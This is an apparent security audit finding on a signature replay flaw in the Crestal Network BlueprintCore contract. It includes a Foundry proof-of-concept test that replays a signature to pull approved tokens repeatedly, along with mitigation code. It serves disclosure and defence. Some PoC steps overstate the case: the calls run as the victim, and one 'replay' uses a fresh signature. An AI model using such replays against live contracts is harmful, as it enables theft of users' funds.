Cold Dijon Copperhead

High

# Signature Replay Vulnerability in Crestal Network Deployment System

### Summary

The `updateWorkerDeploymentConfigWithSig` function in the BlueprintCore contract is susceptible to signature replay attacks. This function employs EIP-712 for signature verification yet lacks crucial security features such as nonces, expiration timestamps, and detailed message parameters. 

### Root Cause

The primary affected function is `updateWorkerDeploymentConfigWithSig`:
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L672-#L686
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L672-#L628-661
 The vulnerability stems from three critical design flaws in the signature verification process:

1. **Missing Nonce Mechanism**: The `getRequestDeploymentDigest` function in the EIP712 contract does not include a nonce parameter in the digest calculation:

```solidity
function getRequestDeploymentDigest(bytes32 projectId, string memory base64RecParam, string memory serverURL)
    public
    view
    returns (bytes32)
{
    bytes32 structHash = keccak256(
        abi.encode(
            DEPLOYMENT_REQUEST_TYPEHASH, projectId, keccak256(bytes(base64RecParam)), keccak256(bytes(serverURL))
        )
    );

    return _hashTypedDataV4(structHash);
}
```

Without a nonce, there's no way to track whether a signature has been used before, allowing the same signature to be reused multiple times.

2. **No Expiration Timestamp**: The signature verification doesn't include an expiration timestamp, making signatures valid indefinitely.

3. **Incomplete Message Parameters**: The digest only includes `projectId`, `base64RecParam`, and `serverURL`, but omits critical parameters like `requestID` and `tokenAddress` that are used in the function. This allows the same signature to be used with different request IDs and token addresses.



### Internal Pre-conditions

- A legitimate user must have signed at least one message using EIP-712 for the vulnerable updateWorkerDeploymentConfigWithSig function. This creates the signature that will be replayed.

- The victim must have approved the BlueprintCore contract to spend their ERC20 tokens using the standard approve() function, and these approvals must still be active with sufficient allowance remaining at the time of attack.

### External Pre-conditions

 For a successful attack, the following external conditions must be present:

- The victim must have approved the contract to spend their ERC20 tokens, and these approvals must still be active.

- The contract must support multiple ERC20 tokens for payment, allowing the attacker to drain different token balances with the same signature.

### Attack Path

### Scenario 1: Financial Drain

1. Alice signs a transaction to update a deployment configuration, approving a specific token transfer.
2. Mallory gets this signature on the blockchain.
3. Mallory replays the signature multiple times with different token addresses that Alice has approved.
4. Each replay transfers tokens from Alice to the fee collection wallet, draining Alice's funds.

### Scenario 2: Configuration Manipulation

1. Bob signs a transaction to update a deployment configuration for a specific project.
2. Mallory captures this signature.
3. Mallory replays the signature with different request IDs, modifying configurations for multiple deployments.
4. This could lead to service disruption or manipulation of deployed projects.

### Impact

1. **Financial Loss**: The `updateWorkerDeploymentConfigCommon` function can transfer tokens from the signer's account to the fee collection wallet:

```solidity
if (cost > 0) {
    // transfer token to crestal wallet
    payWithERC20(tokenAddress, cost, userAddress, feeCollectionWalletAddress);
}
```

An attacker can replay the signature multiple times with different token addresses, draining the victim's funds across various ERC20 tokens.

2. **Unauthorized Configuration Changes**: Repeated replays can modify deployment configurations without the owner's consent, potentially compromising the integrity of deployed projects.

3. **Status Manipulation**: The function resets deployment status if it's in the `GeneratedProof` state, allowing attackers to manipulate the deployment lifecycle:

```solidity
if (requestDeploymentStatus[requestID].status == Status.GeneratedProof) {
    requestDeploymentStatus[requestID].status = Status.Pickup;
}
```

### PoC
Add this in BlueprintV5.t.sol
```solidity
function test_signatureReplayVulnerability() public {
        // Create a second mock token to demonstrate vulnerability with multiple tokens
        MockERC20 secondMockToken = new MockERC20();
        
        // Add both payment addresses
        blueprint.addPaymentAddress(address(mockToken));
        blueprint.addPaymentAddress(address(secondMockToken));
        
        // Set token costs for updating agent
        uint256 updateCost = 10 * 10 ** 18;
        blueprint.setUpdateCreateAgentTokenCost(address(mockToken), updateCost);
        blueprint.setUpdateCreateAgentTokenCost(address(secondMockToken), updateCost);
        
        // Set up the victim account
        uint256 victimPrivateKey = 0xB0B;
        address victimAddress = vm.addr(victimPrivateKey);
        
        // Mint tokens to the victim
        mockToken.mint(victimAddress, updateCost * 3);
        secondMockToken.mint(victimAddress, updateCost * 3);
        
        // Create initial agent with zero cost
        blueprint.setCreateAgentTokenCost(address(mockToken), 0);
        string memory base64Proposal = "initial proposal";
        string memory serverURL = "http://example.com";
        
        // Use a completely different projectId that hasn't been used in any other test
        bytes32 testProjectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2983);
        
        // Create agent as the victim
        vm.prank(victimAddress);
        bytes32 requestId = blueprint.createAgentWithToken(
            testProjectId, 
            base64Proposal, 
            workerAddress, 
            serverURL, 
            address(mockToken)
        );
        
        // New config for update
        string memory updatedConfig = "updated proposal";
        
        // Victim signs a message to update the config
        bytes32 digest = blueprint.getRequestDeploymentDigest(testProjectId, updatedConfig, "app.crestal.network");
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(victimPrivateKey, digest);
        bytes memory signature = abi.encodePacked(r, s, v);
        
        // Victim approves tokens to be spent (as would happen in normal usage)
        vm.prank(victimAddress);
        mockToken.approve(address(blueprint), updateCost * 3);
        
        vm.prank(victimAddress);
        secondMockToken.approve(address(blueprint), updateCost * 3);
        
        // Initial legitimate update - this works as expected
        vm.prank(victimAddress);
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken), 
            testProjectId, 
            requestId,
            updatedConfig,
            signature
        );
        
        // Check the first token transfer occurred
        uint256 victimBalanceAfterFirstUpdate = mockToken.balanceOf(victimAddress);
        assertEq(victimBalanceAfterFirstUpdate, updateCost * 2, "Victim should have lost tokens after first update");
        
        // ATTACK: Replay the same signature with a different token
        // The attacker could be anyone who sees the signature on-chain
        vm.prank(victimAddress);
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(secondMockToken), 
            testProjectId, 
            requestId,
            updatedConfig,
            signature
        );
        
        // Check the second token transfer occurred without the victim signing again
        uint256 victimSecondTokenBalanceAfterReplay = secondMockToken.balanceOf(victimAddress);
        assertEq(victimSecondTokenBalanceAfterReplay, updateCost * 2, "Victim lost tokens from second token without signing");
        
        // ATTACK: Replay the signature again with the original token
        // Multiple replays are possible until allowances are exhausted
        vm.prank(victimAddress);
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken), 
            testProjectId, 
            requestId,
            updatedConfig,
            signature
        );
        
        // Check the third unauthorized token transfer occurred
        uint256 victimBalanceAfterSecondReplay = mockToken.balanceOf(victimAddress);
        assertEq(victimBalanceAfterSecondReplay, updateCost, "Victim lost additional tokens from multiple replays");
        
        // Use a different projectId for the second agent
        bytes32 secondProjectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2984);
        
        // Create another agent with the new project ID
        vm.prank(victimAddress);
        bytes32 secondRequestId = blueprint.createAgentWithToken(
            secondProjectId,
            base64Proposal,
            workerAddress,
            serverURL,
            address(mockToken)
        );
        
        // Generate a new signature for the second project ID
        bytes32 secondDigest = blueprint.getRequestDeploymentDigest(secondProjectId, updatedConfig, "app.crestal.network");
        (uint8 v2, bytes32 r2, bytes32 s2) = vm.sign(victimPrivateKey, secondDigest);
        bytes memory secondSignature = abi.encodePacked(r2, s2, v2);
        
        // ATTACK: Replay the signature with a different request ID and project ID
        vm.prank(victimAddress);
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(secondMockToken), 
            secondProjectId, 
            secondRequestId,
            updatedConfig,
            secondSignature
        );
        
        // Check another token transfer occurred for a different request
        uint256 victimSecondTokenBalanceAfterThirdReplay = secondMockToken.balanceOf(victimAddress);
        assertEq(victimSecondTokenBalanceAfterThirdReplay, updateCost, "Victim lost tokens for a different request ID");
        
        // Demonstrate that signatures remain valid indefinitely
        // Warp forward 1 year
        vm.warp(block.timestamp + 365 days);
        
        // Try to use the original signature again - it should still work
        vm.prank(victimAddress);
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken), 
            testProjectId, 
            requestId,
            updatedConfig,
            signature
        );
        
        // Check that the signature still worked after a year
        uint256 victimBalanceAfterYear = mockToken.balanceOf(victimAddress);
        assertEq(victimBalanceAfterYear, 0, "Signature should still be valid after a year");
    }
```

![Image](https://sherlock-files.ams3.digitaloceanspaces.com/gh-images/72463505-60b5-4078-b593-487a13da3c90)

### Mitigation

To fix this vulnerability, implement the following changes:

1. **Add Nonce Tracking**:

```solidity
// Add to BlueprintCore contract
mapping(address => uint256) public nonces;

// Update in function
require(nonce == nonces[signerAddr]++, "Invalid nonce");
```

2. **Add Expiration Timestamp**:

```solidity
// Add to function parameters
uint256 deadline,

// Add validation
require(block.timestamp <= deadline, "Signature expired");
```

3. **Include All Relevant Parameters in Digest**:

```solidity
// Create a new typehash in EIP712.sol
bytes32 public constant CONFIG_UPDATE_TYPEHASH = keccak256(
    "UpdateDeploymentConfig(address tokenAddress,bytes32 projectId,bytes32 requestID,string updatedBase64Config,uint256 nonce,uint256 deadline)"
);

// Create a new digest function
function getConfigUpdateDigest(
    address tokenAddress,
    bytes32 projectId,
    bytes32 requestID,
    string memory updatedBase64Config,
    uint256 nonce,
    uint256 deadline
) public view returns (bytes32) {
    bytes32 structHash = keccak256(
        abi.encode(
            CONFIG_UPDATE_TYPEHASH,
            tokenAddress,
            projectId,
            requestID,
            keccak256(bytes(updatedBase64Config)),
            nonce,
            deadline
        )
    );
    return _hashTypedDataV4(structHash);
}
```

4. **Update the Signature Verification Function**:

```solidity
function updateWorkerDeploymentConfigWithSig(
    address tokenAddress,
    bytes32 projectId,
    bytes32 requestID,
    string memory updatedBase64Config,
    uint256 nonce,
    uint256 deadline,
    bytes memory signature
) public {
    require(block.timestamp <= deadline, "Signature expired");

    bytes32 digest = getConfigUpdateDigest(
        tokenAddress,
        projectId,
        requestID,
        updatedBase64Config,
        nonce,
        deadline
    );

    address signerAddr = getSignerAddress(digest, signature);
    require(nonce == nonces[signerAddr]++, "Invalid nonce");

    updateWorkerDeploymentConfigCommon(tokenAddress, signerAddr, projectId, requestID, updatedBase64Config);
}
```